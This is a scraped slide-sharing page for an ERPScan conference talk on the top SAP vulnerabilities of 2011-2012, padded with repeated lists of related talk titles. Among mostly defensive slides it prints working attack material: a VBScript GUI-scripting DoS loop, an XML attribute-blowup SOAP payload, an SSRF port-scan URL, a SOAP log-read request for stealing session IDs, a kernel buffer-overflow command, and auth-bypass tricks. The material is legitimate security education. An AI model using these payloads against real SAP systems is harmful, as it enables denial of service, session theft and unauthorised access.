Assessing and Securing SAP Solutions
 
Attacking SAP users with sapsploit
Attacking SAP users with sapsploit Attacking SAP users with sapsploit
Attacking SAP users with sapsploit
 
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineBreaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
 
Attacking SAP Mobile
Attacking SAP MobileAttacking SAP Mobile
Attacking SAP Mobile
 
Implementing SAP security in 5 steps
Implementing SAP security in 5 stepsImplementing SAP security in 5 steps
Implementing SAP security in 5 steps
 
Sap security – thinking with a hacker’s hat
Sap security – thinking with a hacker’s hatSap security – thinking with a hacker’s hat
Sap security – thinking with a hacker’s hat
 
Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)
 
Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 steps
 
Forgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application SystemsForgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application Systems
 
All your SAP passwords belong to us
All your SAP passwords belong to usAll your SAP passwords belong to us
All your SAP passwords belong to us
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easy
 
SAP security in figures
SAP security in figuresSAP security in figures
SAP security in figures
 
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
 
Sap penetration testing_defense_in_depth
Sap penetration testing_defense_in_depthSap penetration testing_defense_in_depth
Sap penetration testing_defense_in_depth
 
Cyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsCyber-attacks to SAP Systems
Cyber-attacks to SAP Systems
 
Penetration Testing SAP Systems
Penetration Testing SAP SystemsPenetration Testing SAP Systems
Penetration Testing SAP Systems
 
SAP Security - Real life Attacks to Business Processes - Hack in Paris 2015
SAP Security - Real life Attacks to Business Processes - Hack in Paris 2015SAP Security - Real life Attacks to Business Processes - Hack in Paris 2015
SAP Security - Real life Attacks to Business Processes - Hack in Paris 2015
 
Practical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsPractical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applications
 

Similar to SAP (in)security: New and best

SAP (In)Security: New and Best
SAP (In)Security: New and BestSAP (In)Security: New and Best
SAP (In)Security: New and BestPositive Hack Days
 
SAP portal: breaking and forensicating
SAP portal: breaking and forensicating SAP portal: breaking and forensicating
SAP portal: breaking and forensicating ERPScan
 
Top 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPTop 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPERPScan
 
EAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsEAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsERPScan
 
Architecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsArchitecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsERPScan
 
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to usCONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to usPROIDEA
 
EAS-SEC Project
EAS-SEC ProjectEAS-SEC Project
EAS-SEC ProjectERPScan
 
A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine. A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine. ERPScan
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Jim Manico
 
ciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Securityciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP SecurityPriyanka Aash
 
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirementsMySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirementsOlivier DASINI
 
Drupal Security Seminar
Drupal Security SeminarDrupal Security Seminar
Drupal Security SeminarCalibrate
 
ERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERPScan
 
Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2drewz lin
 
Managing the SSL Process
Managing the SSL ProcessManaging the SSL Process
Managing the SSL ProcessRocket Software
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNEDChris Gates
 

Similar to SAP (in)security: New and best (20)

SAP (In)Security: New and Best
SAP (In)Security: New and BestSAP (In)Security: New and Best
SAP (In)Security: New and Best
 
SAP portal: breaking and forensicating
SAP portal: breaking and forensicating SAP portal: breaking and forensicating
SAP portal: breaking and forensicating
 
Top 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPTop 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAP
 
EAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsEAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applications
 
Architecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsArchitecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platforms
 
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to usCONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
 
EAS-SEC Project
EAS-SEC ProjectEAS-SEC Project
EAS-SEC Project
 
A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine. A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine.
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
 
2014 09-04-pj
2014 09-04-pj2014 09-04-pj
2014 09-04-pj
 
ciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Securityciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Security
 
Attacks on SAP Mobile
Attacks on SAP MobileAttacks on SAP Mobile
Attacks on SAP Mobile
 
OWASP an Introduction
OWASP an Introduction OWASP an Introduction
OWASP an Introduction
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
 
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirementsMySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
 
Drupal Security Seminar
Drupal Security SeminarDrupal Security Seminar
Drupal Security Seminar
 
ERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, Solutions
 
Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2
 
Managing the SSL Process
Managing the SSL ProcessManaging the SSL Process
Managing the SSL Process
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNED
 

More from ERPScan

Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...ERPScan
 
Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)ERPScan
 
13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applications13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applicationsERPScan
 
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...ERPScan
 
What CISOs should know about SAP security
What CISOs should know about SAP securityWhat CISOs should know about SAP security
What CISOs should know about SAP securityERPScan
 
With big data comes big responsibility
With big data comes big responsibilityWith big data comes big responsibility
With big data comes big responsibilityERPScan
 
Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)ERPScan
 
Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)ERPScan
 

More from ERPScan (8)

Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
 
Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)
 
13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applications13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applications
 
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
 
What CISOs should know about SAP security
What CISOs should know about SAP securityWhat CISOs should know about SAP security
What CISOs should know about SAP security
 
With big data comes big responsibility
With big data comes big responsibilityWith big data comes big responsibility
With big data comes big responsibility
 
Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)
 
Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)
 

SAP (in)security: New and best

  • 1. Invest  in  security   to  secure  investments   SAP  (In)Security:  New  and   Best   Alexander  Polyakov.  CTO  at  ERPScan   1  
  • 2. About  ERPScan   •  The   only   360-­‐degree   SAP   Security   soluHon   -­‐   ERPScan   Security   Monitoring  Suite  for  SAP   •  Leader  by  the  number  of  acknowledgements  from  SAP  (  150+  )   •  60+  presenta>ons  key  security  conferences  worldwide   •  25  Awards  and  nomina>ons   •  Research  team  -­‐  20  experts  with  experience  in    different  areas   of  security   •  Headquarters  in  Palo  Alto  (US)  and  Amsterdam  (EU)       2  
  • 3. What  is  SAP  ?                      Shut  up              And              Pay   3  
  • 4. Really   •  The  most  popular  business  applicaHon   •  More  than  120000  customers   •  74%  of  Forbes  500   4  
  • 5. Agenda   •  Intro   •  SAP  security  history   •  SAP  on  the  Internet   •  Most  popular  SAP  issues  (OLD)   •  Top  10  latest  interesHng  a[acks  (NEW)   •  DEMOs   •  Conclusion     5  
  • 6. 6   3  areas  of  SAP  Security   2010   Applica3on  pla4orm  security   Prevents  unauthorized  access  both  insiders  and  remote   a3ackers   SoluHon:  Vulnerability  Assessment  and  Monitoring   2008   ABAP  Code  security   Prevents  a3acks  or  mistakes  made  by  developers   SoluHon:  Code  audit   2002   Business  logic  security  (SOD)   Prevents  a3acks    or  mistakes  made     SoluHon:  GRC  
  • 7. 0   5   10   15   20   25   30   35   2006   2007   2008   2009   2010   2011   2012   Most  popular:   •  BlackHat     •  HITB     •  Troopers     •  RSA     •  Source     •  DeepSec       •  etc.   Talks  about  SAP  security   7  
  • 8. 0   100   200   300   400   500   600   700   800   900   2001   2002   2003   2004   2005   2006   2007   2008   2009   2010   2011   2012   By  April  26,  2012,  a  total  of  2026  notes   SAP  Security  notes   8  
  • 9. 0   50   100   150   200   250   300   350   12  -­‐SQL  Inj   11  -­‐  BOF   10  -­‐  Denial  of  service     9  -­‐  Remote  Code  ExecuHon   8  -­‐  Verb  tampering   7  -­‐  Code  injecHon  vulnerability   6  -­‐  Hard-­‐coded  credenHals   5  -­‐  Unauthorized  usage  of  applicaHon   4  -­‐  InformaHon  Disclosure   3  -­‐  Missing  Auth  check   2  -­‐  XSS/Unauthorised  modificaHon  of   1  -­‐  Directory  Traversal       Stats  from  :   •  1Q  2012   •  1Q  2010   •  4Q  2009   SAP  vulnerabili>es  by  type   9  
  • 10. Top  problems  by  OWASP-­‐EAS   (Implementa>on  issues)   •  EASAI-­‐1  Lack  of  patch  management   •  EASAI-­‐2  Default  Passwords  for  applicaHon  access   •  EASAI-­‐3  SOD  conflicts   •  EASAI-­‐4  Unnecessary  Enabled  ApplicaHon  features     •  EASAI-­‐5  Open  Remote  management  interfaces   •  EASAI-­‐6  lack  of  password  lockout/complexity  checks   •  EASAI-­‐7  Insecure  opHons     •  EASAI-­‐8  Unencrypted  communicaHons   •  EASAI-­‐9  Insecure  trust  relaHons   •  EASAI-­‐10  Guest  access   10  
  • 11. Top  problems  by  BIZEC   •  BIZEC  TEC-­‐01:  Vulnerable  Sojware  in  Use   •  BIZEC  TEC-­‐02:  Standard  Users  with  Default  Passwords   •  BIZEC  TEC-­‐03:  Unsecured  SAP  Gateway   •  BIZEC  TEC-­‐04:  Unsecured  SAP/Oracle  authenHcaHon   •  BIZEC  TEC-­‐05:  Insecure  RFC  interfaces   •  BIZEC  TEC-­‐06:  Insufficient  Security  Audit  Logging   •  BIZEC  TEC-­‐07:  Unsecured  SAP  Message  Server   •  BIZEC  TEC-­‐08:  Dangerous  SAP  Web  ApplicaHons   •  BIZEC  TEC-­‐09:  Unprotected  Access  to  AdministraHon  Services   •  BIZEC  TEC-­‐10:  Insecure  Network  Environment   •  BIZEC  TEC-­‐11:  Unencrypted  CommunicaHons   11  
  • 12. Business  Risks   Espionage   •  Stealing  financial  informaHon   •  Stealing  corporate  secrets   •  Stealing  suppliers  and  customers  list   •  Stealing  HR  data   Sabotage   •  Denial  of  service   •  ModificaHon  of  financial  reports   •  Access  to  technology  network  (SCADA)  by  trust  relaHons     Fraud   •  False  transacHons   •  ModificaHon  of  master  data   •  e.t.c.   12  
  • 13. SAP  on  the  Internet   MYTH:  SAP  systems  a^acks    available  only  for  insiders   •  We  have  collected  data  about  SAP  systems  in  the  WEB   •  Have  various  stats  by  countries,  applicaHons,  versions   •  InformaHon  from  Google,  Shodan,  Nmap  scan   13  
  • 14. SAP  on  the  Internet   14  
  • 15. About  5000  systems  including  Dispatcher,  Message  server,    SapHostcontrol,  Web-­‐  services   SAP  on  the  Internet   15  
  • 16. Top  10  vulnerabili>es  2011-­‐2012   1.  AuthenHcaHon  Bypass  via  Verb  tampering   2.  AuthenHcaHon  Bypass    via  the  Invoker  servlet     3.  Buffer  overflow  in  ABAP  Kernel   4.  Code  execuHon  via  TH_GREP   5.  MMC  read  SESSIONID   6.  Remote  portscan   7.  EncrypHon  in  SAPGUI     8.  BAPI  XSS/SMBRELAY       9.  XML  Blowup  DOS   10.  GUI  ScripHng  DOS   16  
  • 17. 10  –  GUI-­‐Scrip>ng  DOS:  Descrip>on       •  SAP  users  can  run  scripts  which  automate  their  user  funcHons   •  A  script  has  the  same  rights  in  SAP  as  the  user  who  launched  it   •  Security  message  which  is  shown  to  user  can  be  turned  off  in   the  registry   •  Almost  any  user  can  use  SAP  Messages  (SM02  transacHon)   •  It  is  possible  to  run  DOS  a[ack  on  any  user  using  a  simple  script           New   Author: Dmitry Chastukhin (ERPScan) 17  
  • 18. 10  –  GUI-­‐scrip>ng:  Details     If Not IsObject(application) Then Set SapGuiAuto = GetObject("SAPGUI") Set application = SapGuiAuto.GetScriptingEngine End If If Not IsObject(connection) Then Set connection = application.Children(0) End If If Not IsObject(session) Then Set session = connection.Children(0) End If If IsObject(WScript) Then WScript.ConnectObject session, "on" WScript.ConnectObject application, "on" End If do a=a+1 session.findById("wnd[0]").maximize session.findById("wnd[0]/tbar[0]/okcd").text = "/nsm02" session.findById("wnd[0]/tbar[0]/btn[0]").press session.findById("wnd[0]/tbar[1]/btn[34]").press session.findById("wnd[1]/usr/txtEMLINE1").text = "hello" session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0 session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0 session.findById("wnd[1]").sendVKey 4 session.findById("wnd[2]/usr/lbl[1,3]").setFocus session.findById("wnd[2]/usr/lbl[1,3]").caretPosition = 15 session.findById("wnd[2]").sendVKey 2 session.findById("wnd[1]/usr/ctxtTEMSG-CLIENT").text = "800" session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").text = "en" session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").setFocus session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").caretPosition = 2 session.findById("wnd[1]/tbar[0]/btn[0]").press Loop Until a>=1000 18  
  • 19. 10  –  GUI-­‐scrip>ng:  Other  a^acks       Other  a^acks  like  changing  banking  accounts  in  LFBK  also  possible     Script  can  be  uploaded  using:   •  SAPGUI  AcHveX  vulnerability     •  Teensy  USB  flash     •  Any  other  method  of  client  exploitaHon     19  
  • 20. 10  –  GUI-­‐scrip>ng:    Business  risks   Ease  of  exploita>on  –  Medium   Sabotage  –  High   Espionage  –  No   Fraud  –  No   20  
  • 21.  10  –  GUI-­‐scrip>ng:    Preven>on     •       SAP  GUI  ScripHng  Security  Guide   •       sapgui/user_scripHng  =  FALSE   •       Block  registry  modificaHon  on  workstaHons     21  
  • 22. 9  –  XML  Blowup  DOS:  Descrip>on       •  WEBRFC  interface  can  be  used  to  run  RFC  funcHons   •  By  default  any  user  can  have  access   •  Can  execute  at  least  RFC_PING   •  SAP  NetWeaver  is  vulnerable  to  malformed  XML  packets   •  It  is  possible  to  run  DOS  a[ack  on  server  using  simple  script     •  It  is  possible  to  run  over  the  Internet!           New   Author: Alexey Tyurin (ERPScan) 22  
  • 23. 9  –  XML  Blowup  DOS:  Details     <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <SOAP-ENV:Body><m:RFC_PING xmlns:m="urn:sap-com:document:sap:rfc:functions" a1="" a2="" ... a10000="" > </m:RFC_PING> </SOAP-ENV:Body> </SOAP-ENV:Envelope> 23  
  • 24. 9  –  XML  Blowup  DOS:  Business  risks   Ease  of  exploita>on  –  Medium   Espionage  –  No   Fraud  –  No   Sabotage  –  Cri>cal   24  
  • 25.  9  –  XML  Blowup  DOS:    Preven>on   •       Disable  WEBRFC           •       Prevent  unauthorized  access  to  WEBRFC  using  S_ICF   •       Install  SAP  notes  1543318  and  1469549     25  
  • 26. Author: Dmitry Chastukhin (ERPScan) 8  –  BAPI  script  injec>on/hash  stealing  :   Descrip>on     •  SAP  BAPI  transacHon  fails  to  properly  saniHze  input   •  Possible  to  inject  JavaScript  code  or  link  to  a  fake  SMB  server   •  SAP   GUI   clients   use   Windows   so   their   credenHals   will   be   transferred  to  a[ackers  host.           26  
  • 27. New   8  –  BAPI  script  injec>on/hash  stealing:   Demo   27  
  • 28. Ease  of  exploita>on  –  Low   Sabotage    –  High   Espionage    –  High   Fraud    –  High   8  –  BAPI  script  injec>on/hash  stealing:   Business  risks   28  
  • 29. 7  –  SAP  GUI  bad  encryp>on:  Descrip>on   •  SAP  •  SAP  FrontEnd  can  save  encrypted  passwords  in  shortcuts     •  Shortcuts  stored  in  .sap  file   •  This  password  uses  byte-­‐XOR  algorithm  with  “secret”  key   •  Key  has  the  same  value  for  every  installaHon  of  SAP  GUI   •  Any  password  can  be  decrypted  in  1  second         Author:Author: Alexey Sintsov (ERPScan New  
  • 30. 7  –  SAP  GUI  bad  encryp>on:  Demo     30  
  • 31. 7  –  SAP  GUI  bad  encryp>on:  Business  risks   Sabotage  –  Medium   Fraud  –  High   Espionage  –  High   Ease  of  exploita>on  –  Medium   31  
  • 32. 7  –  SAP  GUI  bad  encryp>on:  Preven>on     •       Disable  password  storage  in  GUI     32  
  • 33. 6  –  Remote  port  scan  via  JSP:  Descrip>on     •   It  is  possible  to  scan  internal  network  from  the  Internet   •   Authen>ca>on  is  not  required   •   SAP  NetWeaver  J2EE  engine  is  vulnerable     •  /ipcpricing/ui/BufferOverview.jsp?   •  server=172.16.0.13     •  &  port=31337     •  &  password=     •  &  dispatcher=     •  &  targetClient=     •  &  view=   Author: Alexander Polyakov (ERPScan) 33  
  • 34. 6  –  Remote  port  scan  via  JSP:  Demo   Port  closed   HTTP  port   SAP  port   34  
  • 35. 6  –  Remote  port  scan  via  JSP:  Business  risks   Ease  of  exploita>on  –  High   Espionage  –  Medium   Fraud  –  No   Sabotage  –  Low   35  
  • 36. 6  –  Remote  port  scan  via  JSP:  Preven>on     •       Install  SAP  notes:    1548548,  1545883,  1503856,  948851,  1545883   •       Disable  unnecessary  applicaHons     36  
  • 37. 5  –  MMC  JSESSIONID  stealing:  Descrip>on     •  Remote  management  of  SAP  Plaworm   •  By  default,  many  commands  go  without  auth   •  Exploits  implemented  in  Metasploit  (by  ChrisJohnRiley)   •  Most  of  the  bugs  are  informaHon  disclosure   •  It  is  possible  to  find  informaHon  about  JSESSIONID   •  Only  if  trace  is  ON   Can  be  authen>cated  as  an  exis>ng  user  remotely   1)  Original bug by ChrisJohnRiley 2)  JSESSIONID by Alexey Sintsov and Alexey Tyurin (ERPScan) New   37  
  • 38. 5  –  MMC  SESSIONID  stealing:  Details     <?xml version="1.0" encoding="UTF-8" ?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http:// www.w3.org/2001/XMLSchema"> <SOAP-ENV:Header> <sapsess:Session xmlns:sapsess = "http:// www.sap.com/webas/630/soap/features/session/"> <enableSession>true</ enableSession> </sapsess:Session> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:ReadLogFile xmlns:ns1="urn:SAPControl"> <filename>j2ee/cluster/server0/log/system/ userinterface.log</filename> <filter></filter> <language></language> <maxentries>100</maxentries> <statecookie>EOF</statecookie> </ns1:ReadLogFile> </SOAP-ENV:Body> </SOAP-ENV:Envelope> 38  
  • 39. 5  –  MMC  JSESSIONID  stealing:  Business  risks   Espionage  –  Cri>cal   Sabotage  –  Medium   Fraud  –  High   Ease  of  exploita>on  –  Medium   39  
  • 40. 5  –  MMC  JSESSIONID  stealing:  Preven>on     •  The  JSESSIONID  by  default  will  not  be  logged  in  log  file     •  Don’t  use  TRACE_LEVEL  =  3  on  producHon  systems  or  delete   traces  ajer  use   •  Other  info  h[p://help.sap.com/saphelp_nwpi71/helpdata/ en/d6/49543b1e49bc1fe10000000a114084/frameset.htm       40  
  • 41. •  RCE  vulnerability  in  RFC  module  TH_GREP   •  Found  by  Joris  van  de  Vis   •  SAP  was  not  properly  patched  (1433101)   •  We  have  discovered  that  the  patch  can  be  bypassed  in   Windows     Origina  l  bug  by  Joris  van  de  Vis  (erp-­‐sec)   Bypass  by  Alexey  Tyurin  (ERPScan)   4    –  Remote  command  execu>on  in   TH_GREP:  Descrip>on   41  
  • 42. 4  –  RCE  in  TH_GREP:  Details       elseif opsys = 'Windows NT'. concatenate '/c:"' string '"' filename into grep_params in character mode. else. /*if linux*/ /* 185 */ replace all occurrences of '''' in local_string with '''"''"'''. /* 186 */ concatenate '''' local_string '''' filename into grep_params /* 187*/ in character mode. /* 188*/ endif. /* 188*/ 42  
  • 43. 4  –  RCE  in  TH_GREP:  Demo  #1   43  
  • 44. 4  -­‐  RCE  in  TH_GREP:  More  details     4  ways  to  execute  vulnerable  program     •  Using  transacHon  "Se37“   •  Using  transacHon  “SM51“  (thanks  to  Felix  Granados)   •  Using  remote  RFC  call  "TH_GREP"   •  Using  SOAP  RFC  call  "TH_GREP"    via  web     44  
  • 45. 4  –  RCE  in  TH_GREP:  Demo  #2   45  
  • 46. 4  –  RCE  in  TH_GREP:  Business  risks   Sabotage  –  Medium   Fraud  –  High   Espionage  –  High   Ease  of  exploita>on  –  medium   46  
  • 47. 4  –  RFC  in  TH_GREP:  Preven>on   •       Install  SAP  notes  1580017,  1433101   •       Prevent  access  to  criHcal  transacHons  and  RFC  funcHons   •       Check  the  ABAP  code  of  your  Z-­‐transacHons  for  similar   vulnerabiliHes   47  
  • 48. 3  -­‐  ABAP  Kernel  BOF:  Descrip>on   •  Presented  by    Andreas  Wiegenstein  at  BlackHat  EU  2011   •  Buffer  overflow  in  SAP  kernel  funcHon  C_SAPGPARAM   •   When  NAME  field  is  more  than  108  chars   •  Can  be  exploited  by  calling  an  FM  which  uses  C_SAPGPARAM   •  Example  of    report  –  RSPO_R_SAPGPARAM   Author: (VirtualForge) 48  
  • 49. 3  -­‐ABAP  Kernel  BOF:  Details   > startrfc.exe -3 -h 172.16.0.63 -s 01 -c 000 –u SAP* -p 11111 -F RSPO_R_SAPGPARAM -E NAME=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAA -t 4 RFC Call/Exception: SYSTEM_FAILURE Group Error group 104 Key RFC_ERROR_SYSTEM_FAILURE Message connection closed without message (CM_NO_DATA_RECEIVED) 49  
  • 50. 3  –  ABAP  Kernel  BOF:    Business  risks   Ease  of  exploita>on  –  Medium   Espionage    –  Cri>cal   Fraud    –  Cri>cal   Sabotage    –  Cri>cal   50  
  • 51. 3  –  ABAP  Kernel  BOF:  Preven>on   •   Install  SAP  notes:   -  1493516  –  CorrecHng  buffer  overflow  in  ABAP  system  call   -  1487330  –  PotenHal  remote  code  execuHon  in  SAP  Kernel   •       Prevent  access  to  criHcal  transacHons  and  RFC  funcHons   •       Check  the  ABAP  code  of  your  Z-­‐transacHons  for  criHcal  calls   51  
  • 52. 2  –  Invoker  Servlet:  Descrip>on   •  Rapidly  calls  servlets  by  their  class  name   •  Published  by  SAP  in  their  security  guides   •  Possible  to  call  any  servlet  from  the  applicaHon   •  Even  if  it  is  not  declared  in    WEB.XML   Can  be  used  for  auth  bypass   52  
  • 53. 2  -­‐  Invoker  Servlet:  Details   <servlet> <servlet-name>CriticalAction</servlet-name> <servlet-class>com.sap.admin.Critical.Action</servlet- class> </servlet> <servlet-mapping> <servlet-name>CriticalAction</</servlet-name> <url-pattern>/admin/critical</url-pattern> </servlet-mapping <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource-name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> Author: Dmitry Chastukhin (ERPScan) What  if  we  call  /servlet/com.sap.admin.Cri>cal.Ac>on     53  
  • 54. 2  –  Invoker  servlet:  Business  risks   Ease  of  use  –  Very  easy!   Espionage    –  High   Sabotage    –  High   Fraud    –  High   54  
  • 55. 2  -­‐  Invoker  servlet:  Preven>on   •  Update  to  the  latest  patch  1467771,  1445998   •  “EnableInvokerServletGlobally”   property   of   the   servlet_jsp  must  be  “false”       If  you  can’t  install  patches  for  some  reason,  you  can  check   all  WEB.XML  files  using  ERPScan  web.xml  scanner  manually.   55  
  • 56.  1  –  VERB  Tampering   56  
  • 57. 1st    Place  –  Verb  Tampering   <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource- name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> What  if  we  use  HEAD  instead  of  GET  ?   Author: Alexander Polyakov (ERPScan) 57  
  • 58. 1st  Place  –  Verb  tampering:  Details   Remotely  without  authen>ca>on!   •  CTC  –  Secret  interface  for  managing  J2EE  engine   •  Can  be  accessed  remotely     •  Can  run  user  management  acHons:     –  Add  users   –  Add  to  groups   –  Run  OS  commands   –  Start/Stop  J2EE   58  
